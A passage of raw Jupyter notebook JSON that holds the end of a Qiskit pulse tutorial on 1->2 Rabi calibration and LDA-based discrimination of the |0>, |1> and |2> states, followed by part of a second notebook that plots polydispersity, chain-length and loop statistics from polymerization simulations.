"# experimental configuration\nnum_rabi_points = 75 # number of experiments (ie amplitudes to sweep out)\n\n# Drive amplitude values to iterate over: 75 amplitudes evenly spaced from 0 to 1.0\ndrive_amp_min = 0\ndrive_amp_max = 1.0\ndrive_amps = np.linspace(drive_amp_min, drive_amp_max, num_rabi_points)",
"_____no_output_____"
],
[
"amp = Parameter('amp')\nwith pulse.build(backend=backend, default_alignment='sequential', name='Amp sweep') as rabi_sched:\n drive_chan = pulse.drive_channel(qubit)\n pulse.set_frequency(qubit_12_freq, drive_chan)\n pulse.play(pulse.Gaussian(duration=x12_duration,\n amp=amp,\n sigma=x12_sigma,\n name='x12_pulse'), drive_chan)",
"_____no_output_____"
],
[
"rabi_gate = Gate(\"rabi\", 1, [amp])\n\nqc_rabi = QuantumCircuit(1, 1)\n\nqc_rabi.x(0)\nqc_rabi.append(rabi_gate, [0])\nqc_rabi.measure(0, 0)\nqc_rabi.add_calibration(rabi_gate, (0,), rabi_sched, [amp])\n \nexp_rabi_circs = [qc_rabi.assign_parameters({amp: a}) for a in drive_amps]\n ",
"_____no_output_____"
],
[
"rabi_12_job = backend.run(exp_rabi_circs, \n meas_level=1, \n meas_return='avg', \n shots=NUM_SHOTS)",
"_____no_output_____"
],
[
"job_monitor(rabi_12_job)",
"Job Status: job has successfully run\n"
],
[
"# Get the job data (average)\nrabi_12_data = get_job_data(rabi_12_job, average=True)",
"_____no_output_____"
],
[
"def baseline_remove(values):\n \"\"\"Center data around 0.\"\"\"\n return np.array(values) - np.mean(values)",
"_____no_output_____"
],
[
"# Note: Only real part of data is plotted\nrabi_12_data = np.real(baseline_remove(rabi_12_data))\n(rabi_12_fit_params, \n rabi_12_y_fit) = fit_function(drive_amps,\n rabi_12_data, \n lambda x, A, B, drive_12_period, phi: (A*np.cos(2*np.pi*x/drive_12_period - phi) + B),\n [0.2, 0, 0.3, 0])\n\nplt.scatter(drive_amps, rabi_12_data, color='black')\nplt.plot(drive_amps, rabi_12_y_fit, color='red')\n\ndrive_12_period = rabi_12_fit_params[2] \n\npi_amp_12 = drive_12_period/2\n\nplt.axvline(pi_amp_12, color='red', linestyle='--')\nplt.axvline(pi_amp_12+drive_12_period/2, color='red', linestyle='--')\nplt.annotate(\"\", xy=(pi_amp_12+drive_12_period/2, 0), xytext=(pi_amp_12,0), arrowprops=dict(arrowstyle=\"<->\", color='red'))\nplt.annotate(\"$\\pi$\", xy=(pi_amp_12-0.03, 0.1), color='red')\n\nplt.xlabel(\"Drive amp [a.u.]\", fontsize=15)\nplt.ylabel(\"Measured signal [a.u.]\", fontsize=15)\nplt.title('Rabi Experiment (1->2)', fontsize=20)\nplt.show()\n",
"_____no_output_____"
]
],
[
[
"We plot and fit our data as before.",
"_____no_output_____"
]
],
[
[
"print(f\"Our updated estimate for the 1->2 transition frequency is \"\n f\"{round(qubit_12_freq/GHz, 7)} GHz.\")\nprint(f\"Pi Amplitude (1->2) = {pi_amp_12}\")",
"Our updated estimate for the 1->2 transition frequency is 4.6186648 GHz.\nPi Amplitude (1->2) = 0.16461038080918777\n"
]
],
[
[
"### Build the 0, 1, 2 discriminator <a id=\"builddiscrim012\"></a>",
"_____no_output_____"
],
[
"Finally, we build our discriminator for the $|0\\rangle$, $|1\\rangle$ and $|2\\rangle$ states. ",
"_____no_output_____"
],
[
"As a review, our three circuits are (again, recalling that our system starts in the $|0\\rangle$ state): \n1. Measure the $|0\\rangle$ state directly (obtain $|0\\rangle$ centroid).\n2. Apply $0\\rightarrow1$ $\\pi$ pulse and then measure (obtain $|1\\rangle$ centroid).\n3. Apply $0\\rightarrow1$ $\\pi$ pulse, then $1\\rightarrow2$ $\\pi$ pulse, then measure (obtain $|2\\rangle$ centroid).",
"_____no_output_____"
]
],
[
[
"with pulse.build(backend=backend, default_alignment='sequential', name='x12 schedule') as x12_sched:\n drive_chan = pulse.drive_channel(qubit)\n pulse.set_frequency(qubit_12_freq, drive_chan)\n pulse.play(pulse.Gaussian(duration=x12_duration,\n amp=pi_amp_12,\n sigma=x12_sigma,\n name='x12_pulse'), drive_chan)",
"_____no_output_____"
],
[
"# Create the three circuits\n\n# 0 state\nqc_ground = QuantumCircuit(1, 1)\nqc_ground.measure(0, 0)\n\n# 1 state\nqc_one = QuantumCircuit(1, 1)\nqc_one.x(0)\nqc_one.measure(0, 0)\n\n# 2 state \nx12_gate = Gate(\"one_two_pulse\", 1, [])\nqc_x12 = QuantumCircuit(1, 1)\nqc_x12.x(0)\nqc_x12.append(x12_gate, [0])\nqc_x12.measure(0, 0)\nqc_x12.add_calibration(x12_gate, (0,), x12_sched, [])",
"_____no_output_____"
]
],
[
[
"We construct the program and plot the centroids in the IQ plane.",
"_____no_output_____"
]
],
[
[
"# Assemble the schedules into a program\nIQ_012_job = backend.run([qc_ground, qc_one, qc_x12], \n meas_level=1, \n meas_return='single', \n shots=NUM_SHOTS)",
"_____no_output_____"
],
[
"job_monitor(IQ_012_job)",
"Job Status: job has successfully run\n"
],
[
"# Get job data (single); split for zero, one and two\nIQ_012_data = get_job_data(IQ_012_job, average=False)\nzero_data = IQ_012_data[0]\none_data = IQ_012_data[1]\ntwo_data = IQ_012_data[2]",
"_____no_output_____"
],
[
"def IQ_012_plot(x_min, x_max, y_min, y_max):\n \"\"\"Helper function for plotting IQ plane for 0, 1, 2. Limits of plot given\n as arguments.\"\"\"\n # zero data plotted in blue\n plt.scatter(np.real(zero_data), np.imag(zero_data), \n s=5, cmap='viridis', c='blue', alpha=0.5, label=r'$|0\\rangle$')\n # one data plotted in red\n plt.scatter(np.real(one_data), np.imag(one_data), \n s=5, cmap='viridis', c='red', alpha=0.5, label=r'$|1\\rangle$')\n # two data plotted in green\n plt.scatter(np.real(two_data), np.imag(two_data), \n s=5, cmap='viridis', c='green', alpha=0.5, label=r'$|2\\rangle$')\n\n # Plot a large dot for the average result of the 0, 1 and 2 states.\n mean_zero = np.mean(zero_data) # takes mean of both real and imaginary parts\n mean_one = np.mean(one_data)\n mean_two = np.mean(two_data)\n plt.scatter(np.real(mean_zero), np.imag(mean_zero), \n s=200, cmap='viridis', c='black',alpha=1.0)\n plt.scatter(np.real(mean_one), np.imag(mean_one), \n s=200, cmap='viridis', c='black',alpha=1.0)\n plt.scatter(np.real(mean_two), np.imag(mean_two), \n s=200, cmap='viridis', c='black',alpha=1.0)\n \n plt.xlim(x_min, x_max)\n plt.ylim(y_min,y_max)\n plt.legend()\n plt.ylabel('I [a.u.]', fontsize=15)\n plt.xlabel('Q [a.u.]', fontsize=15)\n plt.title(\"0-1-2 discrimination\", fontsize=15)",
"_____no_output_____"
],
[
"x_min = -5\nx_max = 5\ny_min = -10\ny_max = 10\nIQ_012_plot(x_min, x_max, y_min, y_max)",
"_____no_output_____"
]
],
[
[
"Now it is time to actually build the discriminator. We will use a machine learning technique called Linear Discriminant Analysis (LDA). LDA classifies an arbitrary data set into a set of categories (here $|0\\rangle$, $|1\\rangle$ and $|2\\rangle$) by maximizing the distance between the means of each category and minimizing the variance within each category. For further detail, see [here](https://scikit-learn.org/stable/modules/lda_qda.html#id4) (Ref. [3](#refs)). \n\nLDA generates a line called a separatrix. Depending on which side of the separatrix a given data point is on, we can determine which category it belongs to. \n\nWe use `scikit.learn` for an implementation of LDA; in a future release, this functionality will be added released directly into Qiskit-Ignis (see [here](https://github.com/Qiskit/qiskit-ignis/tree/master/qiskit/ignis/measurement/discriminator)). ",
"_____no_output_____"
],
[
"We observe a third centroid corresponding to the $|2\\rangle$ state. (Note: If the plot looks off, rerun the notebook.)",
"_____no_output_____"
],
[
"We begin by reshaping our result data into a format suitable for discrimination. ",
"_____no_output_____"
]
],
[
[
"def reshape_complex_vec(vec):\n \"\"\"Take in complex vector vec and return 2d array w/ real, imag entries. This is needed for the learning.\n Args:\n vec (list): complex vector of data\n Returns:\n list: vector w/ entries given by (real(vec], imag(vec))\n \"\"\"\n length = len(vec)\n vec_reshaped = np.zeros((length, 2))\n for i in range(len(vec)):\n vec_reshaped[i]=[np.real(vec[i]), np.imag(vec[i])]\n return vec_reshaped",
"_____no_output_____"
]
],
[
[
"We begin by shaping the data for LDA.",
"_____no_output_____"
]
],
[
[
"# Create IQ vector (split real, imag parts)\nzero_data_reshaped = reshape_complex_vec(zero_data)\none_data_reshaped = reshape_complex_vec(one_data) \ntwo_data_reshaped = reshape_complex_vec(two_data) \n\nIQ_012_data = np.concatenate((zero_data_reshaped, one_data_reshaped, two_data_reshaped))\nprint(IQ_012_data.shape) # verify IQ data shape",
"(3072, 2)\n"
]
],
[
[
"Next, we split our training and testing data. The testing data is a vector containing an array of `0`'s (for the zero schedule, `1`'s (for the one schedule) and `2`'s (for the two schedule).",
"_____no_output_____"
]
],
[
[
"# construct vector w/ 0's, 1's and 2's (for testing)\nstate_012 = np.zeros(NUM_SHOTS) # shots gives number of experiments\nstate_012 = np.concatenate((state_012, np.ones(NUM_SHOTS)))\nstate_012 = np.concatenate((state_012, 2*np.ones(NUM_SHOTS)))\nprint(len(state_012))\n\n# Shuffle and split data into training and test sets\nIQ_012_train, IQ_012_test, state_012_train, state_012_test = train_test_split(IQ_012_data, state_012, test_size=0.5)",
"3072\n"
]
],
[
[
"Finally, we set up our model and train it. The accuracy of our fit is printed.",
"_____no_output_____"
]
],
[
[
"# Set up the LDA\nLDA_012 = LinearDiscriminantAnalysis()\nLDA_012.fit(IQ_012_train, state_012_train)",
"_____no_output_____"
],
[
"# test on some simple data \nprint(LDA_012.predict([[0, 0], [-10, 0], [-15, -5]]))",
"[2. 0. 0.]\n"
],
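[
"# A small illustrative sketch (not part of the original notebook): use the trained discriminator to\n# estimate state populations from a batch of single-shot IQ points, here the held-out test set.\nimport collections\npredicted_states = LDA_012.predict(IQ_012_test)\npopulations = collections.Counter(predicted_states)\nprint({int(state): count / len(predicted_states) for state, count in populations.items()})",
"_____no_output_____"
],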
[
"# Compute accuracy\nscore_012 = LDA_012.score(IQ_012_test, state_012_test)\nprint(score_012)",
"0.8522135416666666\n"
]
],
[
[
"The last step is to plot the separatrix. ",
"_____no_output_____"
]
],
[
[
"# Plot separatrix on top of scatter\ndef separatrixPlot(lda, x_min, x_max, y_min, y_max, shots):\n nx, ny = shots, shots\n\n xx, yy = np.meshgrid(np.linspace(x_min, x_max, nx),\n np.linspace(y_min, y_max, ny))\n Z = lda.predict_proba(np.c_[xx.ravel(), yy.ravel()])\n Z = Z[:, 1].reshape(xx.shape)\n\n plt.contour(xx, yy, Z, [0.5], linewidths=2., colors='black')",
"_____no_output_____"
],
[
"IQ_012_plot(x_min, x_max, y_min, y_max)\nseparatrixPlot(LDA_012, x_min, x_max, y_min, y_max, NUM_SHOTS)",
"_____no_output_____"
]
],
[
[
"Now that we have 3 centroids, the separatrix is no longer a line, but rather a curve containing a combination of two lines. In order to discriminate between $|0\\rangle$, $|1\\rangle$ and $|2\\rangle$ states, our model checks where the IQ point lies relative to the separatrix and classifies the point accordingly.",
"_____no_output_____"
],
[
"## References <a id=\"refs\"></a>",
"_____no_output_____"
],
[
"1. D. C. McKay, T. Alexander, L. Bello, M. J. Biercuk, L. Bishop, J. Chen, J. M. Chow, A. D. C ́orcoles, D. Egger, S. Filipp, J. Gomez, M. Hush, A. Javadi-Abhari, D. Moreda, P. Nation, B. Paulovicks, E. Winston, C. J. Wood, J. Wootton, and J. M. Gambetta, “Qiskit backend specifications for OpenQASM and OpenPulse experiments,” 2018, https://arxiv.org/abs/1809.03452.\n2. Krantz, P. et al. “A Quantum Engineer’s Guide to Superconducting Qubits.” Applied Physics Reviews 6.2 (2019): 021318, https://arxiv.org/abs/1904.06560.\n3. Scikit-learn: Machine Learning in Python, Pedregosa et al., JMLR 12, pp. 2825-2830, 2011, https://scikit-learn.org/stable/modules/lda_qda.html#id4.",
"_____no_output_____"
]
],
[
[
"import qiskit.tools.jupyter\n%qiskit_version_table",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code"
]
] |
cb0345a6a880817bacbe0140ecd3743b47cb6b8c | 147,405 | ipynb | Jupyter Notebook | paper/analysis/Statistics.ipynb | jkrajniak/paper-cg-md-simulations-of-polymerization-with-forward-and-backward-reactions | 8030aed77f8db545faa835542dc67921aa863d88 | [
"Unlicense"
] | null | null | null | paper/analysis/Statistics.ipynb | jkrajniak/paper-cg-md-simulations-of-polymerization-with-forward-and-backward-reactions | 8030aed77f8db545faa835542dc67921aa863d88 | [
"Unlicense"
] | null | null | null | paper/analysis/Statistics.ipynb | jkrajniak/paper-cg-md-simulations-of-polymerization-with-forward-and-backward-reactions | 8030aed77f8db545faa835542dc67921aa863d88 | [
"Unlicense"
] | null | null | null | 207.905501 | 20,898 | 0.881151 | [
[
[
"import collections\nimport numpy as np\nimport seaborn as sns\nimport os\nimport matplotlib.gridspec as gridspec\nimport pickle\nfrom matplotlib import pyplot as plt\nimport matplotlib as mpl\n\npgf_with_custom_preamble = {\n \"text.usetex\": False, # use inline math for ticks\n \"pgf.rcfonts\": False, # don't setup fonts from rc parameters\n}\n\ndef figsize(scale, height_ratio=1.0):\n fig_width_pt = 344.43306 # Get this from LaTeX using \\the\\textwidth\n inches_per_pt = 1.0/72.27 # Convert pt to inch\n golden_mean = (np.sqrt(5.0)-1.0)/2.0 # Aesthetic ratio (you could change this)\n fig_width = fig_width_pt*inches_per_pt*scale # width in inches\n fig_height = height_ratio*fig_width*golden_mean # height in inches\n fig_size = [fig_width,fig_height]\n return fig_size\n\npgf_with_latex = { # setup matplotlib to use latex for output\n \"pgf.texsystem\": \"pdflatex\", # change this if using xetex or lautex\n \"text.usetex\": True, # use LaTeX to write all text\n \"font.family\": \"sans-serif\",\n \"font.serif\": [], # blank entries should cause plots to inherit fonts from the document\n \"font.sans-serif\": [],\n \"font.monospace\": [],\n \"axes.labelsize\": 10, # LaTeX default is 10pt font.\n \"font.size\": 10,\n \"legend.fontsize\": 8, # Make the legend/label fonts a little smaller\n \"xtick.labelsize\": 8,\n \"ytick.labelsize\": 8,\n \"figure.figsize\": figsize(0.9), # default fig size of 0.9 textwidth\n \"pgf.preamble\": [\n r\"\\usepackage[utf8x]{inputenc}\", # use utf8 fonts becasue your computer can handle it :)\n r\"\\usepackage[T1]{fontenc}\", # plots will be generated using this preamble\n ]\n }\n\nsns.set_style('ticks')\nsns.set_context('poster')\nsns.set_palette('dark', 40)\n\ncolors = sns.color_palette('dark', 40)\n\nmpl.rcParams.update(pgf_with_latex)\n\n# I make my own newfig and savefig functions\ndef newfig(width):\n plt.clf()\n fig = plt.figure(figsize=figsize(width))\n ax = fig.add_subplot(111)\n return fig, ax\n\ndef savefig(filename):\n plt.savefig('{}.pgf'.format(filename))\n plt.savefig('{}.pdf'.format(filename))\n\n%matplotlib inline\n\n\n\nfrom scipy import interpolate\n#plt.subplots_adjust(left=.15, bottom=.16, right=.99, top=.97)",
"_____no_output_____"
],
[
"plt.rcParams[\"axes.labelsize\"]",
"_____no_output_____"
],
[
"%matplotlib inline",
"_____no_output_____"
]
],
[
[
"# PDI, Pn\n## No water",
"_____no_output_____"
]
],
[
[
"cr = 0.001\nscan_p0_1000_nowater = collections.defaultdict(list)\nfor f in sorted(os.listdir('scan_p_1000/no_water/')):\n if f.startswith('polstat'):\n k = float(f.split('_')[2])\n if k != cr:\n continue\n d = np.loadtxt(os.path.join('scan_p_1000/no_water/', f))\n header = open(os.path.join('scan_p_1000/no_water/', f)).readline().replace('#', '').split()\n d.dtype = [(x, 'float') for x in header]\n scan_p0_1000_nowater[k].append(d)\n\navg_no_water_pdi = []\np_vals = np.arange(0.0, 0.925, 0.01)\nfor l in scan_p0_1000_nowater[cr]:\n x = (l['cr']/2000)[:, 0]\n y = l['pdi'][:, 0]\n print(x.shape, y.shape, max(x))\n f = interpolate.interp1d(x, y)\n ynew = f(p_vals)\n avg_no_water_pdi.append(ynew)\n #plt.plot(l['cr']/2000, l['pdi'])\np_vals = np.array(p_vals)\nstd_no_water_pdi = np.std(np.array(avg_no_water_pdi), axis=0)\navg_no_water_pdi = np.average(avg_no_water_pdi, axis=0)",
"(9355,) (9355,) 0.925\n(10001,) (10001,) 0.9275\n(9882,) (9882,) 0.925\n(9419,) (9419,) 0.925\n(13990,) (13990,) 0.95\n(8919,) (8919,) 0.925\n"
],
[
"plt.rcParams['figure.figsize'] = figsize(0.9)\nfor l in scan_p0_1000_nowater[cr]:\n x = (l['cr']/2000.0)\n y = l['pdi']\n plt.plot(x, y, '.', markevery=100, alpha=0.8)\n#plt.errorbar(p_vals, avg_no_water_pdi, std_no_water_pdi)\nplt.plot(np.arange(0.0, 1.0, 0.01), 1+np.arange(0.0, 1.0, 0.01), linestyle='--', color='k', linewidth=1.8, label='1+p')\nplt.annotate(r'$k_f={}$'.format(cr), xy=(0.05, 0.75), xycoords='axes fraction', fontsize=12)\nplt.legend(loc=0)\nplt.ylabel('PDI')\nplt.xlabel('p')\nplt.tight_layout()\nplt.xticks([0.0, 0.2, 0.5, 0.8, 0.9, 1.0])\nplt.yticks([1.0, 1.5, 2.0, 2.5])\nplt.tick_params(size=5, direction='inout', right=True)\nplt.savefig('result_graphics/pdi_no_water.pdf', dpi=200)",
"_____no_output_____"
],
[
"plt.rcParams['figure.figsize'] = figsize(0.9, height_ratio=1.5)\nf, (a0, a1) = plt.subplots(2,1, gridspec_kw = {'height_ratios':[2, 1]})\n\nl = scan_p0_1000_nowater[0.001][0]\na0.plot(l['cr']/2000, l['pn'], '*', markevery=200, color='k')\na0.plot(l['cr']/2000, 1/(1-l['cr']/2000), label=r'1/(1-p)', linestyle='--', color='k', linewidth=1.8)\n#a0.set_xlabel('p')\na0.set_ylabel(r'$\\langle n \\rangle$')\na0.legend()\na0.set_xticks([0.0, 0.2, 0.4, 0.6, 0.8, 0.9])\n\nl = scan_p0_1000_nowater[0.001][0]\ntheory_val = 1/(1-l['cr']/2000)\na1.plot(l['cr']/2000, np.abs(l['pn']-theory_val), linestyle='None', marker='.', color='k')\na1.set_xlabel('p')\na1.set_ylabel(r'$|\\Delta|$')\na1.set_xticks([0.0, 0.2, 0.4, 0.6, 0.8, 0.9])\nf.tight_layout()\nplt.savefig('result_graphics/average_n_no_water.pdf', dpi=200)",
"_____no_output_____"
]
],
[
[
"## Water",
"_____no_output_____"
]
],
[
[
"plt.rcParams['figure.figsize'] = figsize(0.9)\ncr = 0.001\nscan_p0_1000_water = collections.defaultdict(list)\nfor f in sorted(os.listdir('scan_p_1000/with_water/')):\n if f.startswith('polstat'):\n k = float(f.split('_')[2])\n if k != cr:\n continue\n d = np.loadtxt(os.path.join('scan_p_1000/with_water/', f))\n header = open(os.path.join('scan_p_1000/with_water/', f)).readline().replace('#', '').split()\n if len(header) < 8:\n continue\n d.dtype = [(x, 'float') for x in header]\n scan_p0_1000_water[k].append(d)\n# avg_water_pdi = []\n# p_vals = np.arange(0.0, 0.925, 0.01)\n# for l in scan_p0_1000_water[0.001]:\n# x = (l['cr']/2000)[:, 0]\n# y = l['pdi'][:, 0]\n# print x.shape, y.shape, max(x)\n# f = interpolate.interp1d(x, y)\n# ynew = f(p_vals)\n# avg_water_pdi.append(ynew)\n# #plt.plot(l['cr']/2000, l['pdi'])\n# p_vals = np.array(p_vals)\n# std_water_pdi = np.std(np.array(avg_water_pdi), axis=0)\n# avg_water_pdi = np.average(avg_water_pdi, axis=0)\n\n\nfor l in scan_p0_1000_water[cr]:\n x = (l['cr']/2000.0)\n y = l['pdi']\n plt.plot(x, y, '.', markevery=100)\nplt.annotate(r'$k_f={}$'.format(cr), xy=(0.05, 0.72), xycoords='axes fraction', fontsize=12)\nplt.plot(np.arange(0.0, 1.0, 0.01), 1+np.arange(0.0, 1.0, 0.01), linestyle='--', color='k', linewidth=1.8, label='1+p')\nplt.ylabel('PDI')\nplt.xlabel('p')\nplt.legend(loc=0)\nplt.tight_layout()\nplt.xticks([0.0, 0.2, 0.5, 0.8, 0.9, 1.0])\nplt.yticks([1.0, 1.5, 2.0, 2.25])\nplt.tick_params(size=5, direction='inout', right=True)\nplt.savefig('result_graphics/pdi_water.pdf', dpi=200)\n#plt.savefig('pdi_water.png', dpi=200)",
"_____no_output_____"
],
[
"plt.rcParams['figure.figsize'] = figsize(0.9, height_ratio=1.5)\nf, (a0, a1) = plt.subplots(2,1, gridspec_kw = {'height_ratios':[2, 1]})\n\na0.plot(scan_p0_1000_water[0.001][1]['cr']/2000, scan_p0_1000_water[0.001][1]['pn'], '*', markevery=200, color='k')\na0.plot(np.arange(0, 0.925, 0.01), 1/(1-np.arange(0, 0.925, 0.01)), label=r'1/(1-p)', linestyle='--', color='k', linewidth=1.8)\na0.set_ylabel(r'$\\langle n \\rangle$')\na0.legend()\na0.set_xticks([0.0, 0.2, 0.4, 0.6, 0.8, 0.9])\n\nl = scan_p0_1000_water[0.001][1]\ntheory_val = 1/(1-l['cr']/2000)\na1.plot(l['cr']/2000, np.abs(l['pn']-theory_val), linestyle='None', marker='.', color='k')\na1.set_xlabel('p')\na1.set_ylabel(r'$|\\Delta|$')\na1.set_xticks([0.0, 0.2, 0.4, 0.6, 0.8, 0.9])\nf.tight_layout()\nplt.savefig('result_graphics/average_n_with_water.pdf', dpi=200)",
"_____no_output_____"
]
],
[
[
"## with water",
"_____no_output_____"
]
],
[
[
"plt.rcParams['figure.figsize'] = figsize(0.9)\ncr = [0.1, 0.01, 0.001]\nscan_p0_1000_water_rev = collections.defaultdict(list)\nfor f in sorted(os.listdir('scan_p_1000/with_water_rev/')):\n if f.startswith('polstat'):\n k = float(f.split('_')[2])\n if k not in cr:\n continue\n k2 = float(f.split('_')[3])\n if k2 != 0.01:\n continue\n d = np.loadtxt(os.path.join('scan_p_1000/with_water_rev/', f))\n header = open(os.path.join('scan_p_1000/with_water_rev/', f)).readline().replace('#', '').split()\n d.dtype = [(x, 'float') for x in header]\n scan_p0_1000_water_rev[k].append(d)\ninter_water_rev_pdi = collections.defaultdict(list)\np_vals = {}\n# for ss, max_cr in [(0.001, 0.32), (0.01, 0.61), (0.1, 0.86)]:\n# p_vals[ss] = np.arange(0.0, max_cr, 0.01)\n# for cr in scan_p0_1000_water_rev:\n# for l in scan_p0_1000_water_rev[cr]:\n# x = (l['cr']/2000)[:, 0]\n# y = l['pdi'][:, 0]\n# f = interpolate.interp1d(x, y)\n# ynew = f(p_vals[cr])\n# inter_water_rev_pdi[cr].append(ynew)\n# std_water_rev_pdi = {}\n# avg_water_rev_pdi = {}\n# for cr in inter_water_rev_pdi:\n# std_water_rev_pdi[cr] = np.std(np.array(inter_water_rev_pdi[cr]), axis=0)\n# avg_water_rev_pdi[cr] = np.average(inter_water_rev_pdi[cr], axis=0)",
"_____no_output_____"
],
[
"# plt.subplot(121)\nmarkers = ['h', '.', 'd']\nlegend_lines = {}\nfor i, cr in enumerate(sorted(scan_p0_1000_water_rev)):\n for l in scan_p0_1000_water_rev[cr]:\n line, = plt.plot(\n l['cr']/2000.0, \n l['pdi'], \n '.', \n markevery=100, \n marker=markers[i])\n legend_lines[cr] = line\nl, = plt.plot(np.arange(0.0, 1.0, 0.01), 1+np.arange(0.0, 1.0, 0.01), linestyle='--', color='k', linewidth=1.8, label='1+p')\nplt.legend()\n# [legend_lines[cr] for cr in sorted(scan_p0_1000_water_rev)] + [l], \n# list(map(r'$k_f={}$'.format, sorted(scan_p0_1000_water_rev.keys()))) + ['1+p'], loc=0)\nplt.annotate(r'$k_f=0.001$', xy=(0.2, 0.05), xycoords='axes fraction')\nplt.annotate(r'$k_f=0.01$', xy=(0.5, 0.3), xycoords='axes fraction')\nplt.annotate(r'$k_f=0.01$', xy=(0.5, 0.3), xycoords='axes fraction')\nplt.annotate(r'$k_f=0.1$', xy=(0.8, 0.35), xycoords='axes fraction')\nplt.annotate(r'$k_r = 0.01$', xy=(0.02, 0.72), xycoords='axes fraction', fontsize=12)\nplt.xlabel('p')\nplt.ylabel('PDI')\nplt.yticks([1.0, 1.5, 2.0])\nplt.xticks([0.0, 0.5, 1.0])\n\nplt.tight_layout()\nplt.savefig('result_graphics/average_pdi_rev_water.pdf', dpi=200)",
"_____no_output_____"
],
[
"plt.rcParams['figure.figsize'] = figsize(0.9)\n# plt.subplots_adjust(left=5, bottom=0, right=6, top=1, wspace=0, hspace=0)\nplot_margin = 0.25\n\nx0, x1, y0, y1 = plt.axis()\n\n\nlegend_lines = {}\nfor i, cr in enumerate(sorted(scan_p0_1000_water_rev)):\n for l in scan_p0_1000_water_rev[cr]:\n line, = plt.plot(\n l['pdi'], \n '.', \n markevery=100, \n marker=markers[i],\n markersize=8.0,\n color=colors[i])\n legend_lines[cr] = line\nplt.annotate(r'$k_r = 0.01$', xy=(0.01, 0.85), xycoords='axes fraction', fontsize=12)\n# plt.legend(\n# [legend_lines[cr] for cr in sorted(scan_p0_1000_water_rev)], \n# map(r'$k_f={}$'.format, sorted(scan_p0_1000_water_rev.keys())), loc=0)\nplt.annotate(r'$k_f=0.001$', xy=(0.75, 0.1), xycoords='axes fraction', color=colors[0], fontsize=12)\nplt.annotate(r'$k_f=0.01$', xy=(0.8, 0.32), xycoords='axes fraction', color=colors[1], fontsize=12)\nplt.annotate(r'$k_f=0.1$', xy=(0.8, 0.8), xycoords='axes fraction', color=colors[2], fontsize=12)\nplt.ylabel('PDI')\nplt.xlabel('simulation time (ps)')\nplt.tight_layout()\nplt.savefig('result_graphics/average_pdi_t_rev_water.pdf', dpi=200, tight_layout=True)",
"_____no_output_____"
],
[
"plt.rcParams['figure.figsize'] = figsize(0.9, height_ratio=1.5)\nf, (a0, a1) = plt.subplots(2,1, gridspec_kw = {'height_ratios':[2, 1]})\nmarkers = ['h', '.', 'd']\nlegend_lines = {}\nfor i, cr in enumerate(sorted(scan_p0_1000_water_rev)):\n for l in scan_p0_1000_water_rev[cr]:\n line, = a0.plot(\n l['cr']/2000.0, \n l['pn'], \n '.', \n markevery=100, \n marker=markers[i],\n color=colors[i])\n legend_lines[cr] = line\nl, = a0.plot(np.arange(0.0, 0.9, 0.01), 1.0/(1.0-np.arange(0.0, 0.9, 0.01)), 'k--', label='1/(1-p)', linewidth=1.8)\n# a0.legend(\n# [legend_lines[cr] for cr in sorted(scan_p0_1000_water_rev)] + [l], \n# list(map(r'$k_f={}$'.format, sorted(scan_p0_1000_water_rev.keys()))) + ['1/(1-p)'])\n#a0.set_xlabel('p')\na0.set_ylabel(r'$\\langle n \\rangle$')\na0.set_xticks([0.0, 0.5, 0.9])\na0.annotate(r'$k_f=0.001$', xy=(0.1, 0.15), xycoords='axes fraction', color=colors[0], fontsize=12)\na0.annotate(r'$k_f=0.01$', xy=(0.5, 0.25), xycoords='axes fraction', color=colors[1], fontsize=12)\na0.annotate(r'$k_f=0.1$', xy=(0.65, 0.55), xycoords='axes fraction', color=colors[2], fontsize=12)\na0.annotate(r'$k_r = 0.01$', xy=(0.02, 0.75), xycoords='axes fraction', fontsize=12)\na0.legend(loc=0)\n\nfor i, cr in enumerate(sorted(scan_p0_1000_water_rev)):\n for l in scan_p0_1000_water_rev[cr]:\n theory_val = 1/(1-l['cr']/2000)\n a1.plot(l['cr']/2000, np.abs(l['pn']-theory_val), color=colors[i], linestyle='None', marker=markers[i], markevery=100)\na1.set_xlabel('p')\na1.set_ylabel(r'$|\\Delta|$')\na1.set_xticks([0.0, 0.5, 0.9])\n\nf.tight_layout()\nf.savefig('result_graphics/average_pn_rev_water.pdf', dpi=200, tight_layout=True)",
"_____no_output_____"
]
],
[
[
"# Loops",
"_____no_output_____"
]
],
[
[
"import pickle\nwith open('scan_p_1000/no_water/loops.pck', 'rb') as ib:\n loops_no_water = pickle.load(ib)\n loops_no_water = [l for x in loops_no_water for l in x] \n# print np.average(loops_no_water), np.std(loops_no_water), np.min(loops_no_water), np.max(loops_no_water), np.sum(loops_no_water)\nwith open('scan_p_1000/with_water/loops.pck', 'rb') as ib:\n loops_water = pickle.load(ib)\n loops_water = [l for x in loops_water for l in x]\n# print np.average(loops_water), np.std(loops_water), np.min(loops_water), np.max(loops_water)\nwith open('scan_p_1000/with_water_rev/old/loops.pck', 'rb') as ib:\n loops_rev_water = pickle.load(ib)\n loops_rev_water = [l for x in loops_rev_water for l in x]\n# print np.average(loops_rev_water), np.std(loops_rev_water), np.min(loops_rev_water), np.max(loops_rev_water)\n\nwith open('scan_p_1000/with_water_rev/old/loops_0.1_0.01.pck', 'rb') as ib:\n loops_rev_water_01 = pickle.load(ib)\n loops_rev_water_01 = [l for x in loops_rev_water_01 for l in x]\n# print np.average(loops_rev_water_01), np.std(loops_rev_water_01), np.min(loops_rev_water_01), 